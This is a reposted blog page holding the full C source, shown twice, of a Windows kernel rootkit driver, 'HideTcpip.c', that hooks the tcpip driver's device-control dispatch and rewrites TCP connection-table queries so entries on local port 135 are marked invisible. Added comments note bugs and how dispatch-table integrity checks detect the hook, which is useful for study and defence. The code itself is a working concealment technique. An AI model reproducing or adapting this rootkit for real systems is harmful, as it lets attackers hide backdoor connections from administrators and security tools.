HideTcpip.c
发布时间:2019-06-09


隐藏tcp端口,来自看雪

//
// Filename Rootkit.c
//
// Author: Jamie Butler
// Email:  james.butler@hbgary.com or butlerjr@acm.org
//
// Description: This is where the work gets done.
//
// Version: 1.0
//
// Reviewer summary: kernel-mode driver (32-bit era, see the PLONG/LONG casts)
// that replaces tcpip's IRP_MJ_DEVICE_CONTROL dispatch entry and rewrites the
// output of one TCP table query IOCTL so that entries with local port 135 are
// marked "invisible". Globals (OldIrpMjDeviceControl, pFile_tcp, pDev_tcp,
// pDrv_tcpip) and the REQINFO / CONNINFO1xx / HTONS definitions are presumably
// in Rootkit.h, which is not shown here.
//
#include "ntddk.h"
#include "tdiinfo.h"
//#include "stdio.h"
//#include "stdlib.h"
#include "Rootkit.h"

//
// DriverEntry - driver load entry point.
//
// Clears the saved tcpip dispatch pointer, registers RootkitUnload as the
// unload callback and installs the IRP_MJ_DEVICE_CONTROL hook on tcpip.
// RegistryPath is unused. Returns the InstallTCPDriverHook status on failure,
// STATUS_SUCCESS otherwise.
//
NTSTATUS DriverEntry(
                   IN PDRIVER_OBJECT  DriverObject,
                   IN PUNICODE_STRING RegistryPath
                    )
{
    NTSTATUS                ntStatus;

    // Reset the saved original dispatch pointer before hooking; RootkitUnload
    // only restores the table entry when this is non-NULL.
    OldIrpMjDeviceControl = NULL;
    DriverObject->DriverUnload = RootkitUnload;

    ntStatus = InstallTCPDriverHook();
    if(!NT_SUCCESS(ntStatus))
        return ntStatus;
    return STATUS_SUCCESS;
}

//
// InstallTCPDriverHook - redirect tcpip's IRP_MJ_DEVICE_CONTROL dispatch.
//
// Resolves \Device\Tcp with IoGetDeviceObjectPointer (which leaves a reference
// on pFile_tcp that RootkitUnload releases), takes the owning DRIVER_OBJECT,
// saves its IRP_MJ_DEVICE_CONTROL entry in OldIrpMjDeviceControl and swaps
// HookedDeviceControl into that slot. Returns the IoGetDeviceObjectPointer
// status on failure, STATUS_SUCCESS otherwise.
//
// Defender note: once this has run, tcpip's MajorFunction entry points at code
// outside the tcpip.sys image, which is exactly what a dispatch-table
// integrity check (entry address vs. owning driver's image range) reports.
// NOTE(review): the (PLONG)/(LONG) casts truncate pointers on 64-bit; the code
// assumes a 32-bit kernel.
//
NTSTATUS InstallTCPDriverHook()
{
    NTSTATUS       ntStatus;
//  UNICODE_STRING deviceNameUnicodeString;
//  UNICODE_STRING deviceLinkUnicodeString;
    UNICODE_STRING deviceTCPUnicodeString;
    WCHAR deviceTCPNameBuffer[]  = L"\\Device\\Tcp";

    pFile_tcp  = NULL;
    pDev_tcp   = NULL;
    pDrv_tcpip = NULL;

    RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);
    ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);
    if(!NT_SUCCESS(ntStatus))
    {
        DbgPrint("读取失败!");   // "read failed!" - \Device\Tcp lookup failed
        return ntStatus;
    }
    DbgPrint("读取成功!");       // "read succeeded!"
    pDrv_tcpip = pDev_tcp->DriverObject;

    // Save the original dispatch routine, then overwrite the table slot with a
    // single InterlockedExchange. The hook is only installed when the slot was
    // non-NULL, so HookedDeviceControl can always chain to the original.
    OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];
    if (OldIrpMjDeviceControl)
        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);

    return STATUS_SUCCESS;
}

//
// HookedDeviceControl - replacement IRP_MJ_DEVICE_CONTROL dispatch for tcpip.
//
// Passes every IRP through to the saved original dispatch routine. Before
// doing so, for a METHOD_NEITHER IOCTL_TCP_QUERY_INFORMATION_EX request whose
// TDIObjectID selects the TCP entity (CO_TL_ENTITY) and one of the object ids
// 0x101, 0x102 or 0x110, it attaches IoCompletionRoutine to the current stack
// location so the query result can be rewritten on completion. Returns
// whatever OldIrpMjDeviceControl returns.
//
// Review notes (behaviour as written, not changed here):
//  - The REQINFO stored in Context is freed only by IoCompletionRoutine, and
//    SL_INVOKE_ON_SUCCESS means that routine runs only on successful
//    completion; a failed or cancelled request leaks the allocation.
//  - The stack location's previous Context value is overwritten and not saved
//    (REQINFO keeps only the old routine pointer and the object id).
//  - The ExAllocatePool result is dereferenced without a NULL check.
//  - Type3InputBuffer is a caller-supplied pointer for METHOD_NEITHER and is
//    dereferenced with no probe or exception handling; a malformed request
//    from user mode would bugcheck.
//  - 'context' is declared but never used.
//
NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    PIO_STACK_LOCATION      irpStack;
    ULONG                   ioTransferType;
    TDIObjectID             *inputBuffer;
    DWORD                    context;   // unused

    //DbgPrint("The current IRP is at %x\n", Irp);

    // Get a pointer to the current location in the Irp. This is where
    // the function codes and parameters are located.
    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction)
    {
        case IRP_MJ_DEVICE_CONTROL:
            if ((irpStack->MinorFunction == 0) && \
                (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
            {
                // The low two bits of an IOCTL code encode the buffering
                // method; only METHOD_NEITHER is handled, because that is the
                // case in which the input buffer lives in Type3InputBuffer.
                ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
                ioTransferType &= 3;
                if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer
                {
                    inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;

                    // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP
                    if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)
                    {
                        DbgPrint("Input buffer %x\n",inputBuffer);
                        // Only these three object ids are intercepted; the
                        // matching CONNINFO1xx record layout is chosen by
                        // ReqType in IoCompletionRoutine.
                        if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))
                        {
                            // Call our completion routine if IRP successful
                            irpStack->Control = 0;
                            irpStack->Control |= SL_INVOKE_ON_SUCCESS;

                            // Save old completion routine if present
                            // (the PIO_COMPLETION_ROUTINE cast is odd: Context is a PVOID)
                            irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));
                            ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;
                            ((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;

                            // Setup our function to be called on completion of IRP
                            irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;
                        }
                    }
                }
            }
        break;

        default:
        break;
    }

    return OldIrpMjDeviceControl(DeviceObject, Irp);
}

//
// IoCompletionRoutine - completion hook that rewrites TCP table query results.
//
// Runs when an IRP tagged by HookedDeviceControl completes successfully.
// Context is the REQINFO allocated there. Irp->UserBuffer is treated as an
// array of CONNINFO101 / CONNINFO102 / CONNINFO110 records, chosen by ReqType,
// with the element count derived from Irp->IoStatus.Information. Every record
// whose src_port is 135 gets status = 0, which the table below labels
// "Invisible": the entry is still returned, only marked so the consumer does
// not display it. The REQINFO is then freed and, if there is an upper stack
// location and a saved completion routine, that routine is called (with a
// NULL Context, since the original Context was not preserved); otherwise the
// IRP's own status is returned.
//
// Defender note: this is a presentation-layer hide. The connection itself is
// untouched, so anything that does not go through this IOCTL path (network
// side observation, a different enumeration mechanism) still sees port 135.
// The original inline comments said "Hide all Web connections"; the constant
// actually compared is 135, not 80.
//
// NOTE(review): Irp->UserBuffer is a raw user-mode address for METHOD_NEITHER
// requests; this only works if completion happens in the requesting thread's
// context - not verified here.
//
NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,
                             IN PIRP Irp,
                             IN PVOID Context)
{
    PVOID OutputBuffer;
    DWORD NumOutputBuffers;
    PIO_COMPLETION_ROUTINE p_compRoutine;
    DWORD i;

    // Connection status values:
    // 0 = Invisible
    // 1 = CLOSED
    // 2 = LISTENING
    // 3 = SYN_SENT
    // 4 = SYN_RECEIVED
    // 5 = ESTABLISHED
    // 6 = FIN_WAIT_1
    // 7 = FIN_WAIT_2
    // 8 = CLOSE_WAIT
    // 9 = CLOSING
    // ...

    OutputBuffer = Irp->UserBuffer;
    p_compRoutine = ((PREQINFO)Context)->OldCompletion;

    if (((PREQINFO)Context)->ReqType == 0x101)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
        for(i = 0; i < NumOutputBuffers; i++)
        {
            // Mark every entry whose local port is 135 as status 0 ("Invisible")
            if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 135)
                ((PCONNINFO101)OutputBuffer)[i].status = 0;
        }
    }
    else if (((PREQINFO)Context)->ReqType == 0x102)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
        for(i = 0; i < NumOutputBuffers; i++)
        {
            // Same filter, CONNINFO102 record layout
            if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 135)
                ((PCONNINFO102)OutputBuffer)[i].status = 0;
        }
    }
    else if (((PREQINFO)Context)->ReqType == 0x110)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
        for(i = 0; i < NumOutputBuffers; i++)
        {
            // Same filter, CONNINFO110 record layout
            if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 135)
                ((PCONNINFO110)OutputBuffer)[i].status = 0;
        }
    }

    // Release the per-request REQINFO allocated in HookedDeviceControl.
    ExFreePool(Context);

    /*
    for(i = 0; i < NumOutputBuffers; i++)
    {
        DbgPrint("Status: %d",OutputBuffer[i].status);
        DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));
        DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));
    }*/

    // Chain to the completion routine that was already on this stack location,
    // if any. Note it receives NULL rather than its original Context.
    if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL))
    {
        return (p_compRoutine)(DeviceObject, Irp, NULL);
    }
    else
    {
        return Irp->IoStatus.Status;
    }
}

//
// RootkitUnload - unload callback: restore tcpip's dispatch entry and drop the
// file-object reference taken by IoGetDeviceObjectPointer.
//
// Restores MajorFunction[IRP_MJ_DEVICE_CONTROL] only if a hook was installed
// (OldIrpMjDeviceControl != NULL), then dereferences pFile_tcp. DriverObject is
// unused.
//
// NOTE(review): DriverUnload callbacks are VOID in the DDK prototype; this one
// is declared NTSTATUS and its return value is never consumed. The
// (PLONG)/(LONG) casts again assume a pointer-sized LONG (32-bit kernel).
//
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
    if (OldIrpMjDeviceControl)
        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);

    if (pFile_tcp != NULL)
        ObDereferenceObject(pFile_tcp);
    pFile_tcp = NULL;

    return STATUS_SUCCESS;
}

 

// Filename Rootkit.c
//
// Author: Jamie Butler
// Email:  james.butler@hbgary.com or butlerjr@acm.org
//
// Description: This is where the work gets done.
//
// Version: 1.0
//

#include "ntddk.h"
#include "tdiinfo.h"
//#include "stdio.h"
//#include "stdlib.h"
#include "Rootkit.h"

//
// DriverEntry - driver load entry point.
//
// Clears the saved tcpip dispatch pointer, registers RootkitUnload as the
// unload callback and installs the IRP_MJ_DEVICE_CONTROL hook on tcpip.
// RegistryPath is unused. Returns the InstallTCPDriverHook status on failure,
// STATUS_SUCCESS otherwise. OldIrpMjDeviceControl and RootkitUnload are
// presumably declared in Rootkit.h (not shown here).
//
NTSTATUS DriverEntry(
                   IN PDRIVER_OBJECT  DriverObject,
                   IN PUNICODE_STRING RegistryPath
                    )
{
    NTSTATUS                ntStatus;

    // Reset the saved original dispatch pointer before hooking; RootkitUnload
    // only restores the table entry when this is non-NULL.
    OldIrpMjDeviceControl = NULL;
    DriverObject->DriverUnload = RootkitUnload;

    ntStatus = InstallTCPDriverHook();
    if(!NT_SUCCESS(ntStatus))
        return ntStatus;
    return STATUS_SUCCESS;
}
//
// InstallTCPDriverHook - redirect tcpip's IRP_MJ_DEVICE_CONTROL dispatch.
//
// Resolves \Device\Tcp with IoGetDeviceObjectPointer (which leaves a reference
// on pFile_tcp that RootkitUnload releases), takes the owning DRIVER_OBJECT,
// saves its IRP_MJ_DEVICE_CONTROL entry in OldIrpMjDeviceControl and swaps
// HookedDeviceControl into that slot. Returns the IoGetDeviceObjectPointer
// status on failure, STATUS_SUCCESS otherwise. pFile_tcp, pDev_tcp and
// pDrv_tcpip are globals, presumably declared in Rootkit.h.
//
// Defender note: once this has run, tcpip's MajorFunction entry points at code
// outside the tcpip.sys image, which is exactly what a dispatch-table
// integrity check (entry address vs. owning driver's image range) reports.
// NOTE(review): the (PLONG)/(LONG) casts truncate pointers on 64-bit; the code
// assumes a 32-bit kernel.
//
NTSTATUS InstallTCPDriverHook()
{
    NTSTATUS       ntStatus;
//  UNICODE_STRING deviceNameUnicodeString;
//  UNICODE_STRING deviceLinkUnicodeString;
    UNICODE_STRING deviceTCPUnicodeString;
    WCHAR deviceTCPNameBuffer[]  = L"\\Device\\Tcp";

    pFile_tcp  = NULL;
    pDev_tcp   = NULL;
    pDrv_tcpip = NULL;

    RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);
    ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);
    if(!NT_SUCCESS(ntStatus))
    {
        DbgPrint("读取失败!");   // "read failed!" - \Device\Tcp lookup failed
        return ntStatus;
    }
    DbgPrint("读取成功!");       // "read succeeded!"
    pDrv_tcpip = pDev_tcp->DriverObject;

    // Save the original dispatch routine, then overwrite the table slot with a
    // single InterlockedExchange. The hook is only installed when the slot was
    // non-NULL, so HookedDeviceControl can always chain to the original.
    OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];
    if (OldIrpMjDeviceControl)
        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);

    return STATUS_SUCCESS;
}
//
// HookedDeviceControl - replacement IRP_MJ_DEVICE_CONTROL dispatch for tcpip.
//
// Passes every IRP through to the saved original dispatch routine. Before
// doing so, for a METHOD_NEITHER IOCTL_TCP_QUERY_INFORMATION_EX request whose
// TDIObjectID selects the TCP entity (CO_TL_ENTITY) and one of the object ids
// 0x101, 0x102 or 0x110, it attaches IoCompletionRoutine to the current stack
// location so the query result can be rewritten on completion. Returns
// whatever OldIrpMjDeviceControl returns. REQINFO / PREQINFO are presumably
// defined in Rootkit.h.
//
// Review notes (behaviour as written, not changed here):
//  - The REQINFO stored in Context is freed only by IoCompletionRoutine, and
//    SL_INVOKE_ON_SUCCESS means that routine runs only on successful
//    completion; a failed or cancelled request leaks the allocation.
//  - The stack location's previous Context value is overwritten and not saved
//    (REQINFO keeps only the old routine pointer and the object id).
//  - The ExAllocatePool result is dereferenced without a NULL check.
//  - Type3InputBuffer is a caller-supplied pointer for METHOD_NEITHER and is
//    dereferenced with no probe or exception handling; a malformed request
//    from user mode would bugcheck.
//  - 'context' is declared but never used.
//
NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    PIO_STACK_LOCATION      irpStack;
    ULONG                   ioTransferType;
    TDIObjectID             *inputBuffer;
    DWORD                   context;   // unused

    //DbgPrint("The current IRP is at %x\n", Irp);

    // Get a pointer to the current location in the Irp. This is where
    // the function codes and parameters are located.
    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction)
    {
        case IRP_MJ_DEVICE_CONTROL:
            if ((irpStack->MinorFunction == 0) && \
                (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
            {
                // The low two bits of an IOCTL code encode the buffering
                // method; only METHOD_NEITHER is handled, because that is the
                // case in which the input buffer lives in Type3InputBuffer.
                ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
                ioTransferType &= 3;
                if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer
                {
                    inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;

                    // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP
                    if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)
                    {
                        DbgPrint("Input buffer %x\n",inputBuffer);
                        // Only these three object ids are intercepted; the
                        // matching CONNINFO1xx record layout is chosen by
                        // ReqType in IoCompletionRoutine.
                        if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))
                        {
                            // Call our completion routine if IRP successful
                            irpStack->Control = 0;
                            irpStack->Control |= SL_INVOKE_ON_SUCCESS;

                            // Save old completion routine if present
                            // (the PIO_COMPLETION_ROUTINE cast is odd: Context is a PVOID)
                            irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));
                            ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;
                            ((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;

                            // Setup our function to be called on completion of IRP
                            irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;
                        }
                    }
                }
            }
        break;

        default:
        break;
    }

    return OldIrpMjDeviceControl(DeviceObject, Irp);
}
//
// IoCompletionRoutine - completion hook that rewrites TCP table query results.
//
// Runs when an IRP tagged by HookedDeviceControl completes successfully.
// Context is the REQINFO allocated there. Irp->UserBuffer is treated as an
// array of CONNINFO101 / CONNINFO102 / CONNINFO110 records (presumably defined
// in Rootkit.h, as is HTONS), chosen by ReqType, with the element count
// derived from Irp->IoStatus.Information. Every record whose src_port is 135
// gets status = 0, which the table below labels "Invisible": the entry is
// still returned, only marked so the consumer does not display it. The
// REQINFO is then freed and, if there is an upper stack location and a saved
// completion routine, that routine is called (with a NULL Context, since the
// original Context was not preserved); otherwise the IRP's own status is
// returned.
//
// Defender note: this is a presentation-layer hide. The connection itself is
// untouched, so anything that does not go through this IOCTL path (network
// side observation, a different enumeration mechanism) still sees port 135.
// The original inline comments said "Hide all Web connections"; the constant
// actually compared is 135, not 80.
//
// NOTE(review): Irp->UserBuffer is a raw user-mode address for METHOD_NEITHER
// requests; this only works if completion happens in the requesting thread's
// context - not verified here.
//
NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,
                             IN PIRP Irp,
                             IN PVOID Context)
{
    PVOID OutputBuffer;
    DWORD NumOutputBuffers;
    PIO_COMPLETION_ROUTINE p_compRoutine;
    DWORD i;

    // Connection status values:
    // 0 = Invisible
    // 1 = CLOSED
    // 2 = LISTENING
    // 3 = SYN_SENT
    // 4 = SYN_RECEIVED
    // 5 = ESTABLISHED
    // 6 = FIN_WAIT_1
    // 7 = FIN_WAIT_2
    // 8 = CLOSE_WAIT
    // 9 = CLOSING
    // ...

    OutputBuffer = Irp->UserBuffer;
    p_compRoutine = ((PREQINFO)Context)->OldCompletion;

    if (((PREQINFO)Context)->ReqType == 0x101)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
        for(i = 0; i < NumOutputBuffers; i++)
        {
            // Mark every entry whose local port is 135 as status 0 ("Invisible")
            if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 135)
                ((PCONNINFO101)OutputBuffer)[i].status = 0;
        }
    }
    else if (((PREQINFO)Context)->ReqType == 0x102)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
        for(i = 0; i < NumOutputBuffers; i++)
        {
            // Same filter, CONNINFO102 record layout
            if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 135)
                ((PCONNINFO102)OutputBuffer)[i].status = 0;
        }
    }
    else if (((PREQINFO)Context)->ReqType == 0x110)
    {
        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
        for(i = 0; i < NumOutputBuffers; i++)
        {
            // Same filter, CONNINFO110 record layout
            if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 135)
                ((PCONNINFO110)OutputBuffer)[i].status = 0;
        }
    }

    // Release the per-request REQINFO allocated in HookedDeviceControl.
    ExFreePool(Context);

    /*
    for(i = 0; i < NumOutputBuffers; i++)
    {
        DbgPrint("Status: %d",OutputBuffer[i].status);
        DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));
        DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));
    }*/

    // Chain to the completion routine that was already on this stack location,
    // if any. Note it receives NULL rather than its original Context.
    if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL))
    {
        return (p_compRoutine)(DeviceObject, Irp, NULL);
    }
    else
    {
        return Irp->IoStatus.Status;
    }
}
//
// RootkitUnload - unload callback: restore tcpip's dispatch entry and drop the
// file-object reference taken by IoGetDeviceObjectPointer.
//
// Restores MajorFunction[IRP_MJ_DEVICE_CONTROL] only if a hook was installed
// (OldIrpMjDeviceControl != NULL), then dereferences pFile_tcp. DriverObject is
// unused.
//
// NOTE(review): DriverUnload callbacks are VOID in the DDK prototype; this one
// is declared NTSTATUS and its return value is never consumed. The
// (PLONG)/(LONG) casts again assume a pointer-sized LONG (32-bit kernel).
//
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
    if (OldIrpMjDeviceControl)
        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);

    if (pFile_tcp != NULL)
        ObDereferenceObject(pFile_tcp);
    pFile_tcp = NULL;

    return STATUS_SUCCESS;
}

转载于:https://www.cnblogs.com/passedbylove/p/11223794.html
